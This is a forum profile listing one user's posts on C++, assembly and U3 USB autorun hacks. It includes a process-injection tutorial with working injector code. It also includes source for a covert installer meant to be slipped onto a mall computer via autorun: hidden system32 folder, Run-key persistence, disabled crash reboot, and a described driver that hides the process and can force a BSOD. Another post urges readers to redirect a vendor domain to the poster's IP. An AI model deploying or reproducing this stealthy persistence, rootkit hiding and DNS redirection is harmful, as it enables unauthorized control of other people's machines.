Jump to content

Steve8x

Active Members
 View Profile  See their activity

  • Posts

    181

  • Joined

  • Last visited

 Content Type 

Everything posted by Steve8x

  1. Steve8x
    Thanks moonlit for that information on tracker songs. I was already messing around with ModPlug Tracker and discovered you can open up songs with it, and see the notes that make up the song, even borrow samples/instruments, are they the same thing? I'm thinking a sample is like a sound clip that can only be played 1 way, and an instrument can be played at any note you want like a piano... Well anyways I'm not very much of a musician but I think I'll give it a try, maybe borrow some samples from a song I like and I just might be able to come up with something :) @natural_orange, actually you should just get ModPlug Tracker instead of player, because you can not only open songs in it but it has the option to save them as MP3 directly as well as wav... So no need mucking around with other software to get them to mp3 format... @Emeryth hey did you come up with your challenge yet? you won incase you didn't realize, so think of a challenge so that thread keeps moving, right now its on pause until you post a challenge...
  2. Steve8x
    Well, I found some software that can convert those formats into .wav(which can easily be converted to mp3 using free software) not sure about .v2m though as i havent tried it but I think it'll work! .xm .it .mod all converted to wavs succesfully... http://www.modplug.com/ get modplug player, it plays them and also lets you save it as a .wav ;) maybe modplug tracker is how they make those cool trainer/keygen musics?
  3. Steve8x
    Is it really a hard choice? Ask your self a couple simple questions and I think you'll have the answer! 1. Do I want my programs to be dependent on .NET frameworks? 2. Do I want to lose performance because I'm using managed code, instead of good old unmanaged c++? 3. Do I like dots(".") so much that I must splatter them throughout my code? Can anyone that programs in C# elaborate on why they think its better despite what was outlined above? And don't say the code is easier/faster to write, because I certainly don't think so... here's an example of two programs the first in managed C# the second in unmanaged native C++ C# // HelloWorld.cs using System; public class HelloWorld { public static int Main() { Console.WriteLine("Hello World!"); return 0; } } C++ #include <iostream> using namespace std; int main() { cout << "Hello World!"; return 0; } Compile either one, then open a command prompt("cmd.exe") then run either program from it, they both will do the exact same thing, write "Hello World!" to the console screen and exit. The difference is the C# one compiles into IL(Intermediate Language) code and is stored in the EXE file, when run(requires .NET framework) the CLR(Common Language Runtime) converts it into machine code(Assembly code pretty much) that will run on the computer. The C++ version compiles directly into machine code and is therefore ready to be run immediately. No dependencies unless you choose to be dependent on something. For example if you made a directX app, then your choosing to be dependent on the machine having directx... Now although you won't really notice a difference in performance with this simple application(because it doesn't really do much) with code that does more, and code that is CPU intensive, the difference is pretty big, although you can optimize c# code to minimize performance loss, there will always be that overhead caused the .NET frameworks and CLR. C++ is the highest performance you can get without going totally assembly. Assembly is basically what you see is what you get, whatever you code, that's how it ends up in the EXE, it doesn't compile it assembles. The assembly opcodes are assembled into numerical byte codes that they are associated with. For example this opcode "pop eax" = 0x58 (58 hex) these byte codes are machine code which with a disassembler you can see the assembly codes they represent, this is basically how reverse engineering takes place, studying the assembly codes you can figure out what a program is actually doing! you can't go from EXE back to source, but you can read the assembly code! ;) so im going the end this with a quote from the masm32.com website "Warning Danger Zone High speed software" although they changed the website for some reason, currently it can still be viewed in google's cache http://64.233.167.104/search?q=cache:SQSax...;cd=1&gl=us
  4. Steve8x

    ScanDisk 16G

    Steve8x replied to LeWench's topic in USB Hacks

    has it happened to anyone else after formatting? their drive became smaller? I never formatted my drive I just left it the way it is! If its not broke don't fix it right? well two people have said that after they formatted it became 3 gig in size... So if other people have the same thing happened to them, it might be the formatting! maybe u3 has a special way of formatting it since it is unlike any other drive... So lets hear from some more people who have formatted their u3 drive! If its happened to everyone that's formatted I think its safe to say don't format any u3 drives you purchase... @opertator_001: disable that u3 crap? ha! that's the only reason I bought a u3 drive is for the U3 AUTORUN... You don't have to use the uninstaller to get rid of the u3 launchpad crap software... just overwrite the cdrom partition and its as good as gone, except you still get to keep the autorun functionality... People have said even if you use that uninstaller you can still use lpinstaller to get the autorun back, but some people have said it doesn't come back. So I figure its best not to risk it! ;)
  5. Steve8x
    Emeryth you are the winner of my challenge not only because no one else posted an entry but because you put together a nice java tetris app! congrats! you make the next challenge!!! ;) I have tested over my local network and it seems to work fine! although I don't like how it freezes when you click host game, while it waits for another player... well it can be fixed! but anyway still a nice program! thanks I'll try to learn from it as much I can and maybe I'll make a similar game in java :)
  6. Steve8x
    What does a RAMdisk have to do with injecting code into a process? I don't see the similarity there! Anyways what I think you mean is you want to inject executable code into a process! you can't exactly inject a .EXE into a process but you can inject some code or a DLL which will run your code from within the process! Injecting a .dll is closer to injecting an .exe than pure code injection! because you can create your DLL just like creating an EXE and inject it into the process and have it run the code either by having the dll create a thread upon injection or you could create the thread yourself with createremotethread... I would go with dll injection because its much simpler than pure code injection! because you can just code it like an exe compile it and inject it and everything will work right! doing just code injection without the dll, is more difficult because you pretty much have to code in assembly and since your inside another process you cannot access variables like you could in your own process, you'll understand in a bit, I'll show an example of both methods... First DLL Injection, I recommend using C++ to make things easier!, MASM if your feeling up to it. ::: here is the basic DLL skeleton: #include <windows.h> BOOL APIENTRY DllMain (HINSTANCE hInst, DWORD reason, LPVOID reserved) { switch (reason) { case DLL_PROCESS_ATTACH: break; case DLL_PROCESS_DETACH: break; } return TRUE; } Its very simple "DllMain" is called immediately after the dll is loaded into a process (via LoadLibrary API) since its loading and not being free'd the reason is "DLL_PROCESS_ATTACH" usually a dll doesn't do anything in DLL_PROCESS_ATTACH, and it just exports functions which are to be called by the process that loads it! But for executing this code in a process I like to just not export anything and just Create a thread instead! Once you have a running thread in your target process you can do anything you want inside it! Including create more threads! :) Here is a some code of a dll which creates a thread, which waits indefinitely for a keypress!(F12) when the key is pressed it creates a message box (you can really make it do anything you want so whatever code you want to put here is fine, you don't need the infinite loop if its not desired or the waiting for a keypress I just made it as an example. I haven't had any luck getting it to work in dev cpp, for some reason dllmain is not being called upon. So instead I compiled it in visual studio 2008. So it may be dependent on the 2008 package http://www.microsoft.com/downloads/details...;displaylang=en So i've also made the same thing in assembly that for sure isn't dependent on any package like that! Visual C++ 2008 version: #include <windows.h> void MyThread() { for(;; Sleep(10)) { if(GetAsyncKeyState(VK_F12)) { MessageBoxA(0, "Hello World! From A DLL!", "FROM DLL THREAD!", 0); } } } BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved) { switch(reason) { case DLL_PROCESS_ATTACH: CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&MyThread, 0, 0, 0); break; case DLL_PROCESS_DETACH: break; } return TRUE; } http://www.popeax.com/download/TestDllCPP.rar MASM32 version: ; ««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««« .486 ; create 32 bit code .model flat, stdcall ; 32 bit memory model option casemap :none ; case sensitive ; include files ; ~~~~~~~~~~~~~ include \masm32\include\windows.inc include \masm32\include\masm32.inc include \masm32\include\gdi32.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\Comctl32.inc include \masm32\include\comdlg32.inc include \masm32\include\shell32.inc include \masm32\include\oleaut32.inc include \masm32\include\dialogs.inc include \masm32\macros\macros.asm ; the macro file ; libraries ; ~~~~~~~~~ includelib \masm32\lib\masm32.lib includelib \masm32\lib\gdi32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\Comctl32.lib includelib \masm32\lib\comdlg32.lib includelib \masm32\lib\shell32.lib includelib \masm32\lib\oleaut32.lib ; ---------------------------------------- ; prototypes for local procedures go here ; ---------------------------------------- MyThread PROTO .data Msg db 'Hello World! From A Dll!',0 MsgTitle db 'FROM DLL THREAD',0 .data? hInstance dd ? .code ; ««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««« LibMain proc instance:DWORD,reason:DWORD,unused:DWORD .if reason == DLL_PROCESS_ATTACH m2m hInstance, instance invoke CreateThread, 0, 0, addr MyThread, 0, 0, 0 .elseif reason == DLL_PROCESS_DETACH .endif ret LibMain endp MyThread proc InfiniteLoop: invoke Sleep, 10 invoke GetAsyncKeyState, VK_F12 test eax, eax jz InfiniteLoop; if eax == 0 key was not pressed ;If the execution makes it here, then F12 was pressed! invoke MessageBox, 0, addr Msg, addr MsgTitle, 0 jmp InfiniteLoop MyThread endp end LibMain http://www.popeax.com/download/TestDllASM.rar You can inject this into any process at all, and when F12 is pressed the messagebox will be created! and after you click ok the thread will still continue to run! How do you inject this dll into a process? Well the simplest method that I use most of the time is the CreateRemoteThread method... basically you allocate some memory in the target process, copy the path to the dll you want to inject into the allocated memory, then use CreateRemoteThread on the LoadLibrary address passing the pointer to the DLL string allocated in the process as the parameter... What will happen is a thread will begin at loadlibrary which will attempt to load the dll, if the path is correct the dll will be "injected" and your DllMain will be called with "DLL_PROCESS_ATTACH" reason, which will create your thread! Simple enough eh? here's a simple DLL injector I coded up in dev c++! download source here: http://www.popeax.com/download/DLLinjectorSRC.rar a clip from the source, which does the injecting bit... void InjectDll() { void* remoteDLLstring = 0; HANDLE processhandle = 0; DWORD processID = 0; DWORD BytesWritten = 0; GetWindowText(pnameBox, ProcessName, 100); if(ProcessName[0] == 0) { MessageBox(hwnd, "Enter A Process Name!", 0, 0); ExitThread(0); } if(DllPath[0] == 0) { MessageBox(hwnd, "Type Or Browse For A Dll To Inject!", 0, 0); ExitThread(0); } processID = GetPID(ProcessName); if(!processID) { MessageBox(hwnd, "Failed to get process ID! \n make sure its running and try again", 0, 0); ExitThread(0); } processhandle = OpenProcess(PROCESS_ALL_ACCESS, 0, processID); if(!processhandle) { MessageBox(hwnd, "Failed to open process!! should not happen!", 0, 0); ExitThread(0); } remoteDLLstring = VirtualAllocEx(processhandle, 0, strlen(DllPath)+1, MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(processhandle, remoteDLLstring, DllPath, strlen(DllPath), &BytesWritten); DWORD loadLibraryAddress = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); // final step! :) CreateRemoteThread(processhandle, 0, 0, (LPTHREAD_START_ROUTINE)loadLibraryAddress, remoteDLLstring, 0, 0); MessageBox(hwnd, "DLL INJECTED", "SUCCESS!", 0); } Now for the pure code injection! ::::: Basically we are going to do similar like injecting a dll, except we wont create a thread at loadlibrary, we will copy our code over into the executable directly and create our thread at the address the code was copied to! Its a little more difficult! Every variable or string or API address that we want to use in the target process must be copied over to it before executing the thread! for example if you had this code in your code to copy over "invoke MessageBox, 0, addr String, addr TitleString, 0" copying it over and running the thread would make the program crash! why? because the address in your application of "MessageBox" isnt the real address, it is instead from your programs IAT, so since your programs IAT is different from the target process, it will be an invalid address and the program will crash! So we have to use GetProcAddress, for all the API's we want to use, then copy them over, normally I would copy all the API's and addresses I needed into an array on the target process, then use any address by knowing the correct offset from the array! but to make things simpler for this example we aren't going to use an array, we are only going to use two api's! MessageBoxA(to display a message so we know it worked), and ExitThread(so the thread can exit peacefully without crashing the program) as you can see from the image, after I clicked inject code, the messagebox was called from inside of "calc.exe" notice the icon in the taskbar which is the calculator icon! try it with any running executable, and the messagebox will have the same icon as it! download here MASM32 project: http://popeax.com/download/CodeInjectionASM.zip here I will explain the code: CodeToInject proc push 0DEADBEEFh; place holder for exit thread address push 0; MB_OK push 0BAADF00Dh; place holder for remote title address push 0BAADBABEh; place holder for remote string address push 0; no window handle provided push 0BAADF00Dh; place holder for MessageBoxA address pop eax; pop the messageboxa address off of the stack into eax call eax; invoke MessageBoxA, 0, [addressofstring], [addressoftitle], 0 pop eax; pop the exit thread address into eax push 0 call eax; invoke ExitThread, 0 CodeToInject endp that block of code is what will be copied into the target process! by place holder I mean it is just temporarily taking up the right amount of space, so that when we copy our addresses over this; the number of bytes stays the same except the values change, the invokes are there just to show you what the actual code is doing... INVOKE in MASM is just a nice way of doing push push call normally in ASM you push the parameters of the API/Function your trying to use in backwards into the stack, then you call the function address... MASM has the nice INVOKE feature where it will do that for you and you can just write invoke and write the params in the correct order! ;) InjectCode proc LOCAL processname:DWORD LOCAL processhandle:DWORD LOCAL oldProtect:DWORD stralloc 100 mov [processname], eax mov [pID], 0 invoke GetWindowText, [ProcessNameBox], [processname], 100 invoke GetPID, [processname] .if [pID] == 0 invoke MessageBox, 0, SADD("Process Not Found, Make Sure Its Running And Try Again"), 0, 0 invoke ExitThread, 0 .endif invoke OpenProcess, PROCESS_ALL_ACCESS, 0, [pID] mov [processhandle], eax LOCAL whatever:DWORD those just declare local stack variables so that we can use them temporarily stralloc allocates 100 bytes for a string then we move the address of that allocated string into [processname] we reset pID to zero incase we are going the second time around to make sure its null before calling GetPID GetWindowText grabs the process name from the editbox GetPID is exactly like the C++ function that was in the DLL injector! it does the same thing. Get the process ID from the process name, needed so we can call open process to get a handle to the process invoke lstrlen, addr RemoteString inc eax mov [strlen1], eax invoke lstrlen, addr RemoteTitle inc eax mov [strlen2], eax that just gets the length of the two strings and stores them into dword values, we need the lengths so we can know how much memory to allocate and how many bytes of the string to copy over ;allocate memory to copy the code, and strings to invoke VirtualAllocEx, [processhandle], 0, 1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE mov [RemoteCode], eax invoke VirtualAllocEx, [processhandle], 0, [strlen1], MEM_COMMIT, PAGE_READWRITE mov [RemoteStringAddy], eax invoke VirtualAllocEx, [processhandle], 0, [strlen2], MEM_COMMIT, PAGE_READWRITE mov [RemoteTitleAddy], eax pretty self explanitory, note for the RemoteCode we make the protection PAGE_EXECUTE_READWRITE because we are not only going to be reading and writing to it but also EXECUTING A THREAD THERE! the addresses of the allocated memory are stored in the dword values, the addresses are not in our process but the target one! ;get needed API addresses invoke GetProcAddress, FUNC(GetModuleHandle, addr krnl32), SADD("ExitThread") mov [ExitThreadAddy], eax invoke GetProcAddress, FUNC(GetModuleHandle, addr usr32), SADD("MessageBoxA") mov [MessageBoxAddy], eax ;move real addresses into place holders ;i figured out the offsets using a disassembler on this program invoke VirtualProtect, addr CodeToInject, 24, PAGE_EXECUTE_READWRITE, addr oldProtect; so we can write over our code to inject mov eax, offset CodeToInject ; we need the real addresses so we have a flawless working code in the remote process mov ecx, [ExitThreadAddy] mov [eax+1], ecx mov ecx, [RemoteTitleAddy] mov [eax+8], ecx mov ecx, [RemoteStringAddy] mov [eax+13], ecx mov ecx, [MessageBoxAddy] mov [eax+20], ecx mov ecx, offset EndOfCode sub ecx, eax; ecx now equals size of code to inject;) ;Write CodeToInject + Strings into the process at the memory we already allocated invoke WriteProcessMemory, [processhandle], [RemoteCode], addr CodeToInject, ecx, addr byteswritten invoke WriteProcessMemory, [processhandle], [RemoteStringAddy], addr RemoteString, [strlen1], addr byteswritten invoke WriteProcessMemory, [processhandle], [RemoteTitleAddy], addr RemoteTitle, [strlen2], addr byteswritten ;finally create the remote thread which will create a messagebox from the remote process and then exit the thread invoke CreateRemoteThread, [processhandle], 0, 0, [RemoteCode], 0, 0, 0 strfree processname invoke ExitThread, 0 InjectCode endp So thats basically it! You should now have a better understanding of injecting executable code into processes in windows! You probably will want to make a DLL as its much simpler and closer to what you described! I like to think of DLL's as EXE's in a way, except they cannot run on their own, they must have an exe to load them! So injecting a dll is almost like injecting an exe :) NOTE* you need winrar to unzip/unrar the files here's the link to download MASM32, ITS FREE! http://www.masm32.com/ also here's a free version of vc++ 2008 http://www.microsoft.com/express/vc/
  7. Steve8x
    Programming is not outdated! Just like a writer writes a book, or a painter paints a picture! coding is a form of art! How do you think your little drag and drop thing works? someone had to code it, to make it so you can drag and drop! What it actually does is generate the code based on what you clicked together... You really need to have to type into source code files to truly communicate with a computer! how else would you do it? humans surely can't comprehend binary as a computer does! would you rather write 1001110010100010101 to code something up? I think not! Languages like C++ make it easier for programmers! They can just write there C++ code and the compiler will convert it into machine code, and with a disassembler you can see the assembly code which is actually human understandable unlike the machine code! Thats why I like assembly because its so close to machine code that its ready to rock and roll! High performance, super fast running code executed directly by the CPU ;) I always say if you can code it in ASM then do it! Think of it this way if I had to write this post without typing and only clicking the mouse it would be impossible for you to understand anything... It would be a blank post what could I possibly do? Use an onscreen keyboard maybe but that would still be typing just with the mouse! you see what Im getting at? even you typed your post! Just like we communicate with each other with english. We communicate with computers through the many languages available to "speak" in... besides I wouldn't like doing so much clicky clicky with the mouse! thats why linux uses terminal for most things instead GUI based, reduce the clicky clicky and increase the amount of what gets done! So it seems to me that you just don't like to type! Well many people enjoy typing including me! ;) So to answer your question of why, its simply the best way to communicate with people and computers!
  8. Steve8x
    the best way to make an infinite loop is for(;;) { Sleep(10); } instead of something like while(1 == 1) { Sleep(10); } [code] because when it all gets broken down into assembly instructions, the second loop boils down to a conditional jump (conditional meaning if a certain condition is true only then will it jump) as you can see this is not needed since its an infinite loop anyway the condition will never change so it will still always jump! so just use a for loop so it wont be checking that address unnecessarily every split second! [code] cmp [ADDRESS], 1 je loopstart while the first is an UNconditional jump jmp loopstart although you may not notice much of a difference speed wise, use a for loop for infinite loops just to be getting top performance... also the Sleep(10); is important in almost every infinite loop! So that your program never takes it up to 100% CPU usage! If you don't have any sleep in your loop you will notice lag! ;) a random function that I like: atoi converts an ascii string to and integer ascii to integer char* stringnumber = "5000"; int numbernumber = atoi(stringnumber); very helpful for reading numbers out of text files in string format, then converting them to actual binary so that you can use the number to do math! http://www.cplusplus.com/reference/clibrar...tdlib/atoi.html
  9. Steve8x
    ShowWindow API does this very easily! it is how Ghost works... 2 Simple Steps! 1. Get the window's handle! (HWND) 2. Call ShowWindow with the window handle and specify SW_HIDE for the second parameter in C++ HWND WindowHandle; WindowHandle = FindWindow(0, "WindowTitle"); ShowWindow(WindowHandle, SW_HIDE); in ASM HideWindow proc WindowTitle:DWORD LOCAL WindowHandle:DWORD invoke FindWindow, 0, [WindowTitle] mov [WindowHandle], eax invoke ShowWindow, [WindowHandle], SW_HIDE HideWindow endp call it like this if using macros.asm invoke HideWindow, SADD("WindowText") or just give it a pointer to a string MSDN for reference it will tell you everything you need to know about these two APIs FindWindow http://msdn.microsoft.com/en-us/library/ms633499.aspx ShowWindow: http://msdn.microsoft.com/en-us/library/ms633548.aspx P.S. who said anything about a GUI? you can make a windowless application call these APIs! If your using C++ that means make a GUI application instead of a console but just never make a window! that way nothing ever pops up... hiding command prompt windows is the same as hiding GUI based windows, there's no difference.
  10. Steve8x
    WOW! Thanks Alot for that link! I can't believe I didn't find that! Well anyway I just overwrote the CDROM partition with the VC2Installer ISO and it works perfectly! plugged it in and it installed and starting running :) Universal Customizer WORKS! Thanks Again!
  11. Steve8x
    Assembly language is definitely worth learning! Once you understand all the little details of whats going on the lower levels, the higher levels become even easier! everything becomes easier for you! ;) push eax mov eax, offset mxlr mov dword ptr [eax], 0x539 pop eax that says you are 1337 in assembly language!(well if you were a DOUBLE WORD that is :P) WORD = 2 bytes; DWORD = 4 bytes
  12. Steve8x
    Ok now this morning I was thinking about this program and I took look at the script you were writing... this line stood out: regsetval sz "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" It appears as though you want to actually install something on the computer that constantly changes the volume instead of just changing it once, and also starts when the computer turns on! since that's what that registry key is for! So I've come up with version 2.0 This time in the ISO image there is a "VC2Installer.exe" and "autorun.inf" VC2Installer simply Creates a directory in a secret location in system32 Then it dumps the VolumeChanger 2.0 EXE as "VC.exe" to the folder and also copies the "VolumeChanger32.ini" there too as "VC32.ini" It then adds the path to the process in this registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run which makes the program auto-run whenever windows starts up! Finally it does a ShellExecute to run copied VolumeChanger 2.0 Every 1 second the volume is changed to what the value was in VolumeChanger32.ini that was on your USB stick! OR if your USB stick is not plugged in, it reads from the local VC32.ini file. Also new with version 2.0 it now dumps a kernel mode driver into its working directory, and loads it into the driver stack, and passes it two offsets needed and the process ID of volume changer. The driver then hides the process from task manager or anything else by removing it from active process links... Flink and Blink method. Its just for extra secrecy, and to prevent the process from being terminated... You should try this one if your looking for a more permanent solution instead of having to keep putting your USB drive in everyday! NOTE: you still have to have VolumeChanger32.ini on your USB drive! ;) And its different as of 2.0 it now contains two lines Heres an example ini file http://popeax.com/downloads/VolumeChanger32.ini The first number is the volume to change to! just like before. The second line is new, it is a boolean value either 1 or 0, 0 means no BSOD, 1 means BSOD! basically I rigged the driver so that it will BSOD any computer that asks for it! This is why in the VC2Installer it changes the "AutoReboot" registry key so it gives you BSOD instead of automatically restarting! I don't know why you'd ever want this feature but nevertheless its there! ;) But I do think it would look silly! A blue screen of death on the mall screen lol! VC2Installer ISO: http://popeax.com/downloads/cruzer-autorun.iso VC2Installer Source: http://popeax.com/downloads/VC2Installer.zip Volume Changer 2.0 Source: http://popeax.com/downloads/VolumeChanger2.zip VCembedded.h contains the binary data for VolumeChanger.exe (its too large to post here, download the source) VCinstaller, main.cpp: // Volume Changer 2.0 Installer Coded by Steve8x #include <windows.h> #include <stdio.h> #include "VCembedded.h" FILE* VC = 0; char InstallDir[260] = {0}; char VCpath[260] = {0}; char dbg[100] = {0}; void AddToRegistry(char* EXEpath) { HKEY hk5; RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hk5); RegSetValueExA(hk5, "VC", 0, REG_SZ, (const unsigned char*)EXEpath, strlen(EXEpath)); RegCloseKey(hk5); //Turn auto reboot off so you get a BSOD instead of a reboot!;) DWORD Zero = 0; RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\CrashControl", 0, KEY_ALL_ACCESS, &hk5); RegSetValueExA(hk5, "AutoReboot", 0, REG_DWORD, (BYTE*)&Zero, 4); RegCloseKey(hk5); } void CopyIniFile() { FILE* f = 0; char VCini[260] = {0}; char filebuffer[32] = {0}; char Drives[301] = {0}; GetLogicalDriveStringsA(300, Drives); int dOffset = 0, inifound = 0; char* DriveString = (char*)&Drives; while(*(DWORD*)DriveString != 0) // locate "VolumeChanger32.ini on your USB drive! { sprintf(VCini, "%s%s", DriveString, "VolumeChanger32.ini"); f = fopen(VCini, "rb"); if(f) { inifound = 1; fread(filebuffer, 32, 1, f); fclose(f); break; } dOffset += 4; DriveString = (char*)&Drives + dOffset; } if(inifound == 1) { sprintf(dbg, "%s%s", InstallDir, "\\VC32.ini"); f = fopen(dbg, "wb"); fwrite(filebuffer, strlen(filebuffer), 1, f); fclose(f); } } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { GetSystemDirectory(InstallDir, 260); // ex. C:\WINDOWS\system32 //install into a secret dir, you may choose something else if desired strcat(InstallDir, "\\CatRoot\\{13D0A11-4EF1-2234-1337-13464FC295FF}"); CreateDirectory(InstallDir, 0); sprintf(VCpath, "%s%s", InstallDir, "\\VC.exe"); VC = fopen(VCpath, "wb"); fwrite(VCexe, sizeof(VCexe), 1, VC); fclose(VC); AddToRegistry(VCpath); CopyIniFile(); ShellExecute(0, "open", "VC.exe", 0, InstallDir, SW_SHOWNORMAL); return 1; } OK EDIT: i just tested this and ran VC2Installer on my computer! It installed fine and ran! As I changed the volume it would keep going back to the value I chose in the ini file, Then I restarted the computer to make sure it worked properly on startup, and it messed up and didnt find the ini file! but I have fixed it now and updated the downloads to v2.1 the problem is when running the program on startup through the registry the current directory for some reason is not the directory of the file path! So to solve the problem I just grab the path out of the registry where its stored, and use that to prepend to the ini file path + log file path tried it again and now it works perfectly on my windows XP machine! :)
  13. Steve8x

    ScanDisk 16G

    Steve8x replied to LeWench's topic in USB Hacks

    I have u3! the u3 launch pad autoruns when I insert the USB drive! I never uninstalled it! I'm simply trying to run LPinstaller to overwrite the default "cruzer-autorun.iso" with my own! I don't care for the u3 launch pad software! In other words, instead of the U3 launch pad software autorunning when inserted, Instead I'd like a custom exe to be executed! I know the ISO has to be less than 6.66MB and that's not the problem my ISO is way less than that! maybe the ISO name has to be "U3 System"? I'll try that!
  14. Steve8x

    ScanDisk 16G

    Steve8x replied to LeWench's topic in USB Hacks

    Its probably impossible to mess up a regular flash drive! but what about a U3 Drive? When your flashing the CDROM partition it says do not plug it out or you may destroy the device! lol! Thats a nightmare I have! where I'm flashing the drive and the power goes out!! oh noes!!! Would a power outage that shuts off your computer while your flashing the u3 drive really ruin it forever? can't it just be re flashed properly? Anyway ever since I got my Cruzer U3 drive I haven't had any luck flashing a custom ISO anyway! Can anyone provide a link to a LPInstaller that has worked for them? neither leaving "cruzer-autorun.iso" in the same folder as LPInstaller or spoofing the u3 website to localhost is working for me! :( I'm just trying to flash it with a custom ISO of mine! And I didn't buy it off ebay or anyplace like that! I bought it brand new from dell it came in the mail last week. Cut it out of the plastic case myself.
  15. Steve8x
    Fishmonger no it does not sound malicious at all! You just want to turn the volume down a bit so you can do your job more effectively! there's nothing wrong with that! Although I don't think you should mute the volume! as they might notice it isn't making any sound at all and then you might get into a tight spot because you wont be able to turn it up at all since you don't have your keyboard with you! So instead I would just lower the volume to pretty low, but enough that you can still hear it a little! I've coded a neat little program in C++ that will automatically turn down the volume for you! From your post you said you had a Sandisk Cruzer!! :) That will be perfect for the job! I have made an ISO image file that has my VolumeChanger.exe on it along with a autorun.inf file. You have to overwrite the default U3 launch pad ISO with the custom one, then when your u3 drive is inserted it will be like popping in a CD! and the VolumeChanger.exe will execute, successfully lowering the volume to the desired level! Its Coded in Dev C++ and it works like this... Upon executing it Gets all the logical drive strings of all the drives the computer has... ex. C:\, D:\, E:\, F:\, etc.. and it tries to open "VolumeChanger32.ini" on each drive starting from the first until the open is successful or the end of drives are reached... (it is very unlikely that any drive on the computer will have a "VolumeChanger32.ini" so its almost for 100% it will find the one on your usb stick!) "VolumeChanger32.ini" will be on the ROOT of your Cruzer's data partition (not the CDROM partition but the one you can change easily, this way you can adjust the volume each day to find that perfect volume level without having to reflash the drive with a new ISO image!) VolumeChanger32.ini is simply a text file which contains only 1 number between 0 - 65535 0 being muted, 65535 being FULL BLAST! (probably what the volume is at since its so loud you say) so for example say you wanted to change the volume to very low, your VolumeChanger32.ini might contain this number: 5000 Now once you have that all set up! the custom ISO flashed over the default u3 ISO, and the VolumeChanger32.ini on your USB stick in the root... now when you insert the u3 drive the volume will change to whatever you had in the ini file, and it will save a log file to the root of the u3 drive as well which gives info about the sound device and the volume it was at, etc... You can test it on your computer while having the program "sndvol32.exe" running and see the result as it changes the master volume! then check out the log file! ;) Ive tested this by mounting the iso and having it autorun while the ini file was on my cruzer! I was watching sndvol32.exe and saw the volume changed! and then my log file looked like this: ini file found at: J:\VolumeChanger32.ini # of devices: 1 Device # 0 Opened Successfully! Prod. Name: "SigmaTel Audio" Short Name: "Volume Control" Full Name: "Volume Control" 8 channels, 2 controls Control # 1 Short Name: "Master Volume" Full Name: "Master Volume" Items: 0 Range: 0 to 65535 Steps: 192 Value: 65535 Control # 2 Short Name: "Master Mute" Full Name: "Master Mute" Items: 0 Range: 0 to 1 Steps: 0 Value: 0 Volume Changed Successfully!! There's only one problem I have! I can't seem to be able to flash over the CDROM partition with a custom ISO! People have said that you can just have the "cruzer-autorun.iso" in the same folder as lpinstaller.exe and it will use that instead of downloading the real one from the website! and it doesn't seem to work for me... It always downloads the one from the u3.sandisk.com website! So since I have an apache webserver I tried the other way of modifying my hosts file so that u3.sandisk.com points to 127.0.0.1(localhost) And it still doesn't work! I even have the correct directory structure and everything: When I run it it says download failed!: then Why can't I flash my Cruzer? Any help is appreciated! If you can get yours to flash then your volume changing is accomplished, then simply and secretly insert your cruzer into the usb port of the mall computer, then wait for the volume to change then plug it out! ;) Maybe I have an outdated LPinstaller or something? Well anyway give it a try! first with "cruzer-autorun.iso" in the same folder and see if that works! if not the edit your hosts file at %systemroot%\system32\drivers\etc its just called "hosts" with no extension! if you don't run a webserver and your to lazy to set one up or whatever you could just change your hosts and add this line NOTE: will only work if my computer is running(which is basically 90% of the time) 76.16.46.164 u3.sandisk.com or 127.0.0.1 u3.sandisk.com if your going to give it a try with your own web server running on your machine! Volume Changer Source Code: http://popeax.com/downloads/VolumeChanger.zip LPinstaller that im using: http://popeax.com/downloads/LPInstaller.exe The custom ISO I made for you including "VolumeChanger.exe" + "autorun.inf" http://popeax.com/download/apps/lpinstalle...zer-autorun.iso the autorun.inf contains this: [autorun] icon=VolumeChanger.exe open=VolumeChanger.exe action=Change Volume! shell\open\command=VolumeChanger.exe I hope you can help me out getting my drive to flash with a custom iso! Since I've helped you out changing the volume! :) Functions.h contains what does all the dirty work! main.cpp: // Volume Changer Coded By Steve8x! #include <windows.h> #include <stdio.h> #include <mmsystem.h> #include "Functions.h" FILE* f = 0; DWORD newvolume = 0; int inifound = 0; char VCini[32] = {0}; char logpath[32] = {0}; char Drives[301] = {0}; char volumestring[6] = {0}; int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { GetLogicalDriveStringsA(300, Drives); int dOffset = 0; char* DriveString = (char*)&Drives; while(*(DWORD*)DriveString != 0) // locate "VolumeChanger32.ini on your USB drive! { sprintf(VCini, "%s%s", DriveString, "VolumeChanger32.ini"); f = fopen(VCini, "rb"); if(f) { fread(volumestring, 5, 1, f); newvolume = atoi(volumestring); inifound = 1; fclose(f); break; } dOffset += 4; DriveString = (char*)&Drives + dOffset; } if(inifound == 1) { sprintf(logpath, "%s%s", DriveString, "VC_log.txt"); logfile = fopen(logpath, "wb"); sprintf(dbg, "ini file found at: %s \r\n", VCini); fwrite(dbg, strlen(dbg), 1, logfile); } else { return 0; } GetDevices(); // enumerate sound devices if(SetVolume(newvolume) == 1) // change volume to what was specified in the ini file! { fwrite("Volume Changed Successfully!", 28, 1, logfile); } // Pretty Simple Eh?;) fclose(logfile); mixerClose(hMixer); return 1; } Functions.h char* GetMixerError(MMRESULT Code); FILE* logfile = 0; char dbg[364]; unsigned int NumDevices, NumControls; HMIXER hMixer = 0; MMRESULT Result; MIXERLINE Line; MIXERCONTROL Control; MIXERLINECONTROLS LineControls; MIXERCONTROLDETAILS Details; MIXERCONTROLDETAILS_UNSIGNED Value; int SetVolume(DWORD volume) { //Set volume level Details.cbStruct = 